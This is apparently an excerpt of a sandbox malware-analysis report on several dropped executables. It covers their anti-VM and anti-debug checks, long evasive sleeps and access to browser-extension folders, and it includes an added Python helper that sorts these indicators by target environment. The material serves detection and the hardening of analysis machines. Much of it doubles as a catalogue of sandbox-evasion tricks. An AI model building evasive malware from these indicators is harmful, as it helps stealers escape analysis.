Source: Md0q201V1D.exe, 00000003.00000002.338184490.00000000006AB000.00000004.00000020.sdmp, 21.exe, 00000013.00000002.400887733.0000000001F60000.00000004.00000001.sdmp, CBF0.exe, 0000001D.00000002.454053510.000000000323E000.00000004.00000020.sdmp Binary or memory string: ASWHOOK
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\Md0q201V1D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\21.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Roaming\gbhudtb Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\EBBE.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Renames NTDLL to bypass HIPS
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe File opened: C:\Windows\SysWOW64\ntdll.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\B096.exe TID: 4200 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\C066.exe TID: 7772 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\B096.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 571
Found dropped PE file which has not been started or loaded
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F11E.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1AC.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CD17.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C295.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C8FE.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DEDC.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D8D0.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E64F.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FD36.exe
Source: C:\Windows\explorer.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CAC5.exe
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B576B90 rdtsc 29_2_6B576B90
Source: C:\Users\user\AppData\Local\Temp\B096.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\AppData\Local\Temp\C066.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: VMwareVBoxARun using valid operating system
Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.333031309.000000000EF11000.00000004.00000001.sdmp Binary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\Md0q201V1D.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Md0q201V1D.exe System information queried: ModuleInformation
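The evidence above shows what the dropped samples fingerprint: the SCSI enumeration key HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI (whose device instance IDs carry the disk vendor, e.g. Ven_VMware), driver and DLL names tied to VMware, VirtualBox, Sandboxie and Wine/QEMU, and the Avast hook module string ASWHOOK. The Python helper below is an added triage example for this page, not code from the report vendor or from the samples: it parses behaviour lines in the "Source: <source> <event>: <value>" shape used above, keeps the Key enumerated and Binary or memory string values, parses the vendor/product fields out of SCSI device instance IDs, and groups the evidence by the analysis environment each artifact targets. The INDICATORS table, its category names and SAMPLE_LINES are this example's own constructions, built from strings that appear in this report.

```python
"""Group anti-VM / anti-sandbox evidence from sandbox-report behaviour lines
by the analysis environment each artifact reveals.

Added example for this page, not code from the report vendor. INDICATORS,
the category names and SAMPLE_LINES are constructed from strings that appear
in the report above.
"""
import re
from collections import defaultdict

# One behaviour line: "Source: <source> <event>: <value>[ Jump to behavior]".
# Lines with other event types (e.g. "Code function") do not match.
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?) "
    r"(?P<event>Key enumerated|Binary or memory string|Process information set|"
    r"File opened|System information queried|Thread delayed): "
    r"(?P<value>.*?)(?: Jump to (?:behavior|dropped file))?$"
)

# Vendor/product fields of a PnP device instance ID, in either form the
# report shows:
#   SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
#   \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{guid}
DEVICE_ID_RE = re.compile(r"ven_(?P<ven>[^&\\#]+)&prod_(?P<prod>[^&\\#]+)", re.I)

# Case-insensitive substring -> environment it fingerprints (assumed mapping).
INDICATORS = {
    "vmware": "VMware", "vmmouse.sys": "VMware", "vmhgfs.sys": "VMware",
    "necvmwar": "VMware",
    "vbox": "VirtualBox",
    "qemu": "QEMU",
    "wine_get_unix_file_name": "Wine",
    "sbiedll.dll": "Sandboxie",
    "aswhook": "Avast hook DLL",
    "\\enum\\scsi": "SCSI enumeration key (disk vendor check)",
}


def parse_line(line):
    """Split a report line into (source, event, value); None if it is not one."""
    m = LINE_RE.match(line.strip())
    return None if m is None else (m.group("src"), m.group("event"), m.group("value"))


def short_source(src):
    """'C:\\...\\B096.exe' or 'B096.exe, <dump id>' -> 'B096.exe'."""
    return src.split(", ")[0].rsplit("\\", 1)[-1]


def parse_device_id(device_id):
    """Return (vendor, product) from a SCSI device instance ID, else None."""
    m = DEVICE_ID_RE.search(device_id)
    return None if m is None else (m.group("ven"), m.group("prod"))


def classify(value):
    """Set of environment names whose indicators occur in the value."""
    low = value.lower()
    return {env for needle, env in INDICATORS.items() if needle in low}


def triage(lines):
    """Map environment name -> sorted (process, value) evidence pairs."""
    findings = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, event, value = parsed
        # Only registry enumeration and memory strings carry fingerprint data.
        if event not in ("Key enumerated", "Binary or memory string"):
            continue
        proc = short_source(src)
        for env in classify(value):
            findings[env].add((proc, value))
        dev = parse_device_id(value)
        if dev is not None:
            findings["device vendor " + dev[0]].add((proc, value))
    return {env: sorted(pairs) for env, pairs in findings.items()}


# Constructed input in the report's own line format (a subset of the lines above).
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\Md0q201V1D.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior",
    r"Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLLUSER",
    r"Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU",
    r"Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmp Binary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys",
    r"Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}",
    r"Source: C:\Users\user\AppData\Local\Temp\B096.exe Process information set: NOOPENFILEERRORBOX Jump to behavior",
]

if __name__ == "__main__":
    for env, pairs in sorted(triage(SAMPLE_LINES).items()):
        print(env)
        for proc, value in pairs:
            print(f"  {proc}: {value}")
```

Run triage() over the Source: lines of a report, or over strings dumped from a process, to see which sandbox products a sample fingerprints; the "device vendor" entries also show what the sandbox image itself leaks through the SCSI enumeration key, which is worth checking when hardening an analysis VM.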

Anti Debugging:

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Source: C:\Users\user\Desktop\Md0q201V1D.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\21.exe System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Roaming\gbhudtb System information queried: CodeIntegrityInformation
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe System information queried: CodeIntegrityInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Md0q201V1D.exe Code function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00426B90
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 14_2_02BE0042 push dword ptr fs:[00000030h] 14_2_02BE0042
Source: C:\Users\user\AppData\Local\Temp\21.exe Code function: 16_2_02D4D529 push dword ptr fs:[00000030h] 16_2_02D4D529
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 23_2_02CB0042 push dword ptr fs:[00000030h] 23_2_02CB0042
Source: C:\Users\user\AppData\Roaming\gbhudtb Code function: 23_2_02EB2B61 push dword ptr fs:[00000030h] 23_2_02EB2B61
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h] 29_2_6B573B5A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54F340 mov eax, dword ptr fs:[00000030h] 29_2_6B54F340
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54DB40 mov eax, dword ptr fs:[00000030h] 29_2_6B54DB40
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B573B7A mov eax, dword ptr fs:[00000030h] 29_2_6B573B7A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h] 29_2_6B5D6365
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618B58 mov eax, dword ptr fs:[00000030h] 29_2_6B618B58
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h] 29_2_6B56A309
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60131B mov eax, dword ptr fs:[00000030h] 29_2_6B60131B
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D4320 mov eax, dword ptr fs:[00000030h] 29_2_6B5D4320
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5C53CA mov eax, dword ptr fs:[00000030h] 29_2_6B5C53CA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5423F6 mov eax, dword ptr fs:[00000030h] 29_2_6B5423F6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F23E3 mov ecx, dword ptr fs:[00000030h] 29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5F23E3 mov eax, dword ptr fs:[00000030h] 29_2_6B5F23E3
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B541BE9 mov eax, dword ptr fs:[00000030h] 29_2_6B541BE9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56DBE9 mov eax, dword ptr fs:[00000030h] 29_2_6B56DBE9
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544B94 mov edi, dword ptr fs:[00000030h] 29_2_6B544B94
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B601BA8 mov eax, dword ptr fs:[00000030h] 29_2_6B601BA8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5EEB8A mov ecx, dword ptr fs:[00000030h] 29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5EEB8A mov eax, dword ptr fs:[00000030h] 29_2_6B5EEB8A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618BB6 mov eax, dword ptr fs:[00000030h] 29_2_6B618BB6
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B619BBE mov eax, dword ptr fs:[00000030h] 29_2_6B619BBE
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FD380 mov ecx, dword ptr fs:[00000030h] 29_2_6B5FD380
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60138A mov eax, dword ptr fs:[00000030h] 29_2_6B60138A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574BAD mov eax, dword ptr fs:[00000030h] 29_2_6B574BAD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618A62 mov eax, dword ptr fs:[00000030h] 29_2_6B618A62
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D4257 mov eax, dword ptr fs:[00000030h] 29_2_6B5D4257
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542240 mov ecx, dword ptr fs:[00000030h] 29_2_6B542240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B542240 mov eax, dword ptr fs:[00000030h] 29_2_6B542240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549240 mov eax, dword ptr fs:[00000030h] 29_2_6B549240
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D4248 mov eax, dword ptr fs:[00000030h] 29_2_6B5D4248
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B58927A mov eax, dword ptr fs:[00000030h] 29_2_6B58927A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5FB260 mov eax, dword ptr fs:[00000030h] 29_2_6B5FB260
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545210 mov eax, dword ptr fs:[00000030h] 29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545210 mov ecx, dword ptr fs:[00000030h] 29_2_6B545210
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B563A1C mov eax, dword ptr fs:[00000030h] 29_2_6B563A1C
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B558A0A mov eax, dword ptr fs:[00000030h] 29_2_6B558A0A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B548239 mov eax, dword ptr fs:[00000030h] 29_2_6B548239
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B544A20 mov eax, dword ptr fs:[00000030h] 29_2_6B544A20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5CEA20 mov eax, dword ptr fs:[00000030h] 29_2_6B5CEA20
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56A229 mov eax, dword ptr fs:[00000030h] 29_2_6B56A229
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B604AEF mov eax, dword ptr fs:[00000030h] 29_2_6B604AEF
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h] 29_2_6B545AC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h] 29_2_6B545AC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B545AC0 mov eax, dword ptr fs:[00000030h] 29_2_6B545AC0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B572ACB mov eax, dword ptr fs:[00000030h] 29_2_6B572ACB
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543ACA mov eax, dword ptr fs:[00000030h] 29_2_6B543ACA
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B572AE4 mov eax, dword ptr fs:[00000030h] 29_2_6B572AE4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618ADD mov eax, dword ptr fs:[00000030h] 29_2_6B618ADD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h] 29_2_6B57D294
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57D294 mov eax, dword ptr fs:[00000030h] 29_2_6B57D294
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h] 29_2_6B57DA88
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57DA88 mov eax, dword ptr fs:[00000030h] 29_2_6B57DA88
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h] 29_2_6B55AAB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B55AAB0 mov eax, dword ptr fs:[00000030h] 29_2_6B55AAB0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5712BD mov esi, dword ptr fs:[00000030h] 29_2_6B5712BD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h] 29_2_6B5712BD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5712BD mov eax, dword ptr fs:[00000030h] 29_2_6B5712BD
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B541AA0 mov eax, dword ptr fs:[00000030h] 29_2_6B541AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h] 29_2_6B575AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B575AA0 mov eax, dword ptr fs:[00000030h] 29_2_6B575AA0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B60E962 mov eax, dword ptr fs:[00000030h] 29_2_6B60E962
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B618966 mov eax, dword ptr fs:[00000030h] 29_2_6B618966
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h] 29_2_6B54395E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54395E mov eax, dword ptr fs:[00000030h] 29_2_6B54395E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h] 29_2_6B56B944
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B56B944 mov eax, dword ptr fs:[00000030h] 29_2_6B56B944
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h] 29_2_6B54B171
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B171 mov eax, dword ptr fs:[00000030h] 29_2_6B54B171
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h] 29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h] 29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B549100 mov eax, dword ptr fs:[00000030h] 29_2_6B549100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h] 29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h] 29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B550100 mov eax, dword ptr fs:[00000030h] 29_2_6B550100
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B543138 mov ecx, dword ptr fs:[00000030h] 29_2_6B543138
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h] 29_2_6B57513A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57513A mov eax, dword ptr fs:[00000030h] 29_2_6B57513A
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6189E7 mov eax, dword ptr fs:[00000030h] 29_2_6B6189E7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h] 29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h] 29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h] 29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5599C7 mov eax, dword ptr fs:[00000030h] 29_2_6B5599C7
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5431E0 mov eax, dword ptr fs:[00000030h] 29_2_6B5431E0
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B5D41E8 mov eax, dword ptr fs:[00000030h] 29_2_6B5D41E8
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6B54B1E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6B54B1E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54B1E1 mov eax, dword ptr fs:[00000030h] 29_2_6B54B1E1
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h] 29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h] 29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h] 29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B6049A4 mov eax, dword ptr fs:[00000030h] 29_2_6B6049A4
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B574190 mov eax, dword ptr fs:[00000030h] 29_2_6B574190
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B572990 mov eax, dword ptr fs:[00000030h] 29_2_6B572990
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54519E mov eax, dword ptr fs:[00000030h] 29_2_6B54519E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B54519E mov ecx, dword ptr fs:[00000030h] 29_2_6B54519E
Source: C:\Users\user\AppData\Local\Temp\CBF0.exe Code function: 29_2_6B57A185 mov eax, dword ptr fs:[00000030h] 29_2_6B57A185
